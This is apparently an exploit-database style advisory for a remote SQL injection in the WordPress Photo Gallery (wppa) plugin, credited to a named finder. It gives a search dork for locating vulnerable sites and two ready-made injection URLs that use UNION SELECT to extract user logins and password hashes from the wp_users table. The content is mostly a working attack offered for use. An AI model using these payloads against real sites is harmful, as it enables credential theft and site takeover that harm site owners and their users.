The WordPress Photo Gallery module suffers from a remote SQL injection vulnerability.
719359aa85b21086d1095eded92268c25a77428acde35791f74e34179c01fad3
*Script: Wordpress Photo Gallery Mod SQL Injection
Dork: allinurl:"/plugins/wppa/"
Bug Fount : THE_MILLER
msn : the_miller[at]linuxmail[dot]org
ExpLoit :
1)Randomsite.com/photos/?album=1&photo=-11111+union+select+concat(user_login,char(45),user_pass)+from+wp_users--
2)Randomsite.com/?page_id=[gallery
page]&album=10&photo=-16+union+select+concat(user_login,char(45),user_pass)+from+wp_users--